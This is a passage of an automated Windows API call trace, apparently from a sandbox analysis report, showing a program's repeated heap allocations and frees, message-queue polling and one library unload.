lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.832] FreeLibrary (hLibModule=0x74650000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0122.832] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0122.833] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0122.833] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0122.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0122.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0122.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa00 | out: hHeap=0x12c0000) returned 1 [0122.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0122.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa90 | out: hHeap=0x12c0000) returned 1 [0122.833] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0122.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd778 | out: hHeap=0x12c0000) returned 1 [0122.834] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0122.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.834] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff208 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef960 [0122.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300dc8 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd9a0 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd778 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef900 [0122.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd778 | out: hHeap=0x12c0000) returned 1 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0122.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef900 | out: hHeap=0x12c0000) returned 1 [0122.834] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.834] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0122.834] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.834] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9c0 [0122.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef950 [0122.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0122.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0122.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef950 | out: hHeap=0x12c0000) returned 1 [0122.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9c0 | out: hHeap=0x12c0000) returned 1 [0122.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0122.835] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0122.835] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0122.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef930 [0122.835] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0122.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0122.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0122.835] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0122.836] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0122.836] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff258 [0122.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd868 [0122.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa60 [0122.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0122.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0122.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efab0 [0122.836] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0122.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efab0 | out: hHeap=0x12c0000) returned 1 [0122.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0122.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0122.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.836] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0122.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff578 [0122.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0122.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd778 [0122.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0122.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff258 | out: hHeap=0x12c0000) returned 1 [0122.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff578 | out: hHeap=0x12c0000) returned 1 [0122.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd778 | out: hHeap=0x12c0000) returned 1 [0122.837] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.837] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8d0 [0122.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efaa0 [0122.837] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0122.837] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0122.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efaa0 | out: hHeap=0x12c0000) returned 1 [0122.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8d0 | out: hHeap=0x12c0000) returned 1 [0122.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0122.838] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0122.838] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9a0 [0122.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef920 [0122.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0122.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0122.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef920 | out: hHeap=0x12c0000) returned 1 [0122.838] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.838] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0122.839] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef940 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff550 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef9e0 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd778 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa70 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd928 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef930 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa60 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff5c8 [0122.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8f8 | out: hHeap=0x12c0000) returned 1 [0122.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef930 | out: hHeap=0x12c0000) returned 1 [0122.839] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0122.839] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0122.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa70 | out: hHeap=0x12c0000) returned 1 [0122.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9e0 | out: hHeap=0x12c0000) returned 1 [0122.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0122.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef980 [0122.840] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef980 | out: hHeap=0x12c0000) returned 1 [0122.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1491a38 [0122.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa80 [0122.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff500 [0122.840] CharLowerBuffW (in: lpsz="byte[415232]", cchLength=0xc | out: lpsz="byte[415232]") returned 0xc [0122.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14be1f8 [0122.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7c0 [0122.840] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efac0 [0122.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0122.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa40 [0122.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8b0 [0122.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9a0 [0122.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0122.841] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef9b0 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9b0 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8b0 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9a0 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff500 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa80 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff5c8 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa60 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd778 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0122.843] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff550 | out: hHeap=0x12c0000) returned 1 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef940 | out: hHeap=0x12c0000) returned 1 [0122.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x14919d8 [0122.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14bde98 [0122.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0122.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa40 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14be1f8 | out: hHeap=0x12c0000) returned 1 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c18 | out: hHeap=0x12c0000) returned 1 [0122.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x14918f8 [0122.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x24) returned 0x14bde68 [0122.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0122.844] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efac0 [0122.844] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bde98 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3460 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd958 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd970 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1301068 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3e8 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.845] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3c0 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd700 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9a0 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300dc8 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef960 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300bd0 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8f0 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fefd8 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0122.846] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef9d0 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff398 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300e00 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2d0 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300d20 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa50 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7f0 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300b98 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef970 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd760 | out: hHeap=0x12c0000) returned 1 [0122.847] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff320 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0f0 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff438 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ce8 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.848] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0122.849] HeapFree (in: 